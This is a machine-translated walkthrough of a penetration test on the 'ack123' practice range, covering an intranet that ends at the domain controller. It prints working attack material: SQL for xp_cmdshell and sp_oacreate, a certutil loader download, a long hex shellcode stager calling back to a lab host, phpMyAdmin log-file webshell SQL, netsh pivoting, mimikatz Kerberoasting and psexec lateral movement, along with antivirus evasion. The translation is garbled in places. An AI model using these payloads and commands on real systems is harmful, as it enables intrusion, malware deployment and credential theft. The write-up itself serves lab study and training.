Penetration test intranet with defense (ack123 range)


1、 Environment construction

This shooting range comes from the Internet penetration of the dark moon. I saw this article while surfing the Internet a few days ago , just download the shooting range and come back to play

Range address: Extraction code: 7fkj

The topology is like this. The ultimate goal of range penetration is to obtain the permissions of five servers


After downloading and decompressing the target machine, there are five suspended virtual machines. You need to manually add two vmnet 18 and vmnet 19 network cards. The settings are as follows


In addition, I log in to the target, fix the IP addresses as shown in the topology diagram, and put C: \ HWS. In 12server-web1 com\HwsHostMaster\wwwroot\www.ackmoon. com\web\HdhApp. Replace the IP address of config with the address of 12server-data1


Bind the IP and domain name in the C: \ windows \ system32 \ drivers \ etc \ hosts file of the attacker. Originally, the web part of the shooting range is mapped to the public network with FRP. Here, reduce the difficulty and fight locally (


2、 Internet Management

2.1 information collection

Visit the domain name directly Com starts the experiment. The home page shows that the website is built by hdhcms. Search the historical vulnerability and find that there is only one logic defect vulnerability. Let’s take a look at the website. Add admin after the domain name and jump directly to the background. Try to log in with a weak password, and then sweep the directory and port of the target

  • Scanning port: ports 21, 135, 139, 445 and 999 are opened. The server of Windows Server 2012 is phpMyAdmin. You can’t log in after trying weak password and blasting
  • Scan Directory: no available points other than admin directory were found

There is a registration function in the background. First register an account Beiwo/ [email protected] Log in to the system and see some server and system related information displayed in the background


2.2 ueditor1. 4.3 upload any file

ueditor1. 4.3 there is a historical vulnerability. The controller is not found directly in the URL splicing path Ashx file, download it back to the source code and search globally. The final splicing path is as follows. The access page shows that there is a vulnerability


Construct a malicious HTML file

shell addr:


Start a web service locally and make a killing free ASPX horse named test Jpg, fill in the free horse address in the HTML upload box below


Click submit to get the path and add the address , successfully connected to the Trojan horse


2.3 kill free online CS (web1)

For simple host information collection, there are two network cards that are not in the domain. The database configuration file does not have permission to view temporarily. You can raise the right after you are ready to go online


Take a look at the running process using tasklist The online analysis host runs the guardian God and 360 barrels


Then avoid killing online CS


2.4 right to rotten potatoes (web1)

Right click the host – > Erebus – > local privilege escalation – > potatos (ms17-065) – > rotten potato, and the right is successfully raised with the rotten potato module of Erebus plug-in


3、 Intranet penetration

3.1 MSSQL online CS and rights lifting (data1)

Download the database configuration file C: \ HWS com\HwsHostMaster\wwwroot\www.ackmoon. com\web\HdhApp. Config discovery is the target of station database separation, and the database is MSSQL


Use the socks proxy provided by CS, and then configure the proxy server and rules with the proxifier to join Navicat Exe, Navicat successfully connects to the database, then creates a new query and calls XP_ The cmdshell runs system commands

EXEC master..xp_cmdshell 'ipconfig';


(Note: xp_cmdshell is enabled by default in MSSQL2000 and disabled by default in versions after MSSQL2005. If the user has administrator SA permission, you can restart it with sp_configure

#The statement has not been practiced yet. Record it first
#Enable XP_ cmdshell
EXEC sp_configure 'show advanced options',1;
EXEC sp_configure 'xp_cmdshell',1;

#Close XP_ cmdshell
EXEC sp_configure 'show advanced options',1;
EXEC sp_configure 'xp_cmdshell',0;

#Restore / delete XP_ cmdshell
EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll';
EXEC sp_dropextendedproc 'xplog70.dll';



At first, I wanted to use certutil to remotely download the loader, but it has not been successful. I went to the target and found that the tinder interception failed

EXEC master..xp_cmdshell 'certutil -urlcache -split -f C:\Windows\Temp\loader.exe';


The solution comes from this article:Remember to use MSSQL online once

  • Turn on SP_ oacreate
exec sp_configure 'show advanced options', 1;  RECONFIGURE;  exec sp_configure 'Ole Automation Procedures', 1;  RECONFIGURE;
  • Using SP_ The oacreate construct statement will certutil Exe to C: \ windows \ temp \ and rename it sethc exe
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'C:\Windows\System32\certutil.exe' ,'c:\windows\temp\sethc.exe';
  • Certutil tool remote download loader exe
declare @shell int exec sp_oacreate '',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\Temp\sethc.exe -urlcache -split -f "" C:\Windows\Temp\loader.exe'
  • xp_ The cmdshell executes a command to load shellcode
EXEC master..xp_cmdshell 'C:\Windows\Temp\loader.exe fc4883e4f0e8c8000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b0275728b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94fffffff5d6a0049be77696e696e65740041564989e64c89f141ba4c772607ffd54831c94831d24d31c04d31c94150415041ba3a5679a7ffd5eb735a4889c141b8500000004d31c9415141516a03415141ba57899fc6ffd5eb595b4889c14831d24989d84d31c9526800024084525241baeb552e3bffd54889c64883c3506a0a5f4889f14889da49c7c0ffffffff4d31c9525241ba2d06187bffd585c00f859d01000048ffcf0f848c010000ebd3e9e4010000e8a2ffffff2f46793866002ddabc91e8945121d022d02f156a1503c5cd51ccef4de093690d8027d9ea23413e4bdafa614582509588d1d21a7c94b77396fcd533039d35ca438f1452cc83bff3426b0c87a8068f8200557365722d4167656e743a204d6f7a696c6c612f342e302028636f6d70617469626c653b204d53494520372e303b2057696e646f7773204e5420362e30290d0a00b186b2f0542a9dbf956bd1751005d0feca8653a9271e2bd900979626bd13d739a06fe1af267361138b19297bce00622b18c4866f806b76657621a9e971f9bc1160f835c05378f61780b3d5cdd6cc7b24721032dd0c4704227c9610733286a1361a8092259f8b5f90b21383008758f8e83bfb55fa975657ab098d1985e7474895c661487a2c6f6572c50e8802d9714c3c5c4496fa334758f41777626f44d64f4b3f2876d9492dfcb80a3c2461e396f8e362f60de951a10298429a0006d84c8927f11ec9176a32be7473eb17d91755465bd929026caaf8c56aa54d1e158ad216d67668d2d08d68c731fdf5656cf3f30041bef0b5a256ffd54831c9ba0000400041b80010000041b94000000041ba58a453e5ffd5489353534889e74889f14889da41b8002000004989f941ba129689e2ffd54883c42085c074b6668b074801c385c075d758585848050000000050c3e89ffdffff3139322e3136382e35392e3132390012345678';


Data1 successfully launched CS is too laggy, then Erebus chips will be used to lift the rotten potato module. Then web1 will be hung up first, and the five will be too long.


3.2 phpMyAdmin background getshell (web2)

Then, when collecting the host information, we found two network cards. Let’s explore the network segment. Scan the port, find the, open port 80, and use the socks agent provided by CS to access it in the local browser


Prompt that the user name and password are demo. Log in to capture the package and find JWT


Copy to You can see another IP address (there is no IP segment later) and the current user demo, but you can’t forge JWT without the key


The jwtrack tool hasn’t come out for a long time, and another one is comingjwt_toolAnd dictionaryrockyou.txtThe running out key is qweasdzxc5, and the admin user is forged to log in to the system


I don’t know if there is something wrong with my operation. I haven’t forged it successfully. I went to see the public WP and found that the test site is the details of the response header here. It is suspected to use phpstudy V8 1. The path of phpMyAdmin of this version is URL / phpmyadmin4 eight point five

Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02


Then the phpMyAdmin background password is root / qweasdzxc5 (I don’t feel very logical here, but anything can happen in actual combat)


General operation phpMyAdmin background getshell

#Open log
set global general_log='on';
#Set the log location to the site directory
set global general_ log_ file='C:\\phpstudy_ pro\\WWW\\shell. php';# Pass a word
select '';


The ant sword agent is connected to the shell. Through simple information collection, it is found that the server does not kill software. It is directly authorized by the system. It has a domain, and the domain control address is The domain controller is administrator and the domain name is ack123 com


3.3 on line CS (web2) of non outgoing hosts

CS create a listener, choose beacon TCP for payload, generate a stateless Trojan horse and upload it to web2 for operation. Execute connect 2333 in the springboard opportunity. Web2 is connected online in a forward direction, but the session is unstable. It is always online and offline. Try goproxy to send out the traffic, which is very stable

proxy. Exe is uploaded to data1. First, open an HTTP proxy of port 8080 on the outgoing host, and then use the Netsh command provided by the system to forward the HTTP proxy port 8080 of the outgoing segment of the host 59 to port 8888 of the non outgoing segment 22. It is used to set the HTTP proxy during CS listening. Tool download address:

proxy.exe http -t tcp -p "" --daemon
netsh interface portproxy add v4tov4 listenaddress= listenport=8888 connectaddress= connectport=8080


Create a proxy attached listener, and fill in the intranet segment address with HTTP proxy


Computer is too laggy. Then CS is generated. After web2 runs, web1 is successfully launched.


After getting the machine in the domain, first mimikatz and hashdump grab the password. There is only the password of the local administrator. I wanted to decrypt it, but cmd5 didn’t charge money and other websites didn’t find it. First try other ideas


3.4 SPN scanning (web2)

View ack123 Com registered SPN and found SPN service

setspn -T -q */*


Mimikatz applies to create a bill. The bill is encrypted by RC4, so the password of the user corresponding to the service can be obtained by blasting

mimikatz kerberos::ask /target:mysql/


View and export tickets

Mimikatz Kerberos:: list # view
Mimikatz Kerberos:: List / export # export


PWD look at the current path and download the ticket back


The domain management password is [email protected] !, Tool download address: , this password is really not in my common dictionary. I went to see WP and found it in Kali’s dictionary

python3 /usr/share/wordlists/fasttrack.txt [email protected]


3.5 hash transfer (DC1)

There are domain managed accounts and passwords. Try psexec to go online horizontally. Create a new monitor with payload as beacon SMB, probe the surviving host, and then right-click – > jump – > psexec64 to fill in the previously obtained credentials


Domain controller successfully launched! (data2 and DC1 are the same. Similarly, they can be online. If there is not enough memory, the same operation will not be performed for the second time.)


4、 Summary

I learned new things through this target. The PID of CS is different before and after, because the target didn’t restart the session after the computer was restarted in one breath, and I didn’t think the previous online way was beautiful enough. I learned new things and went online again, tossing for learning



Reference article: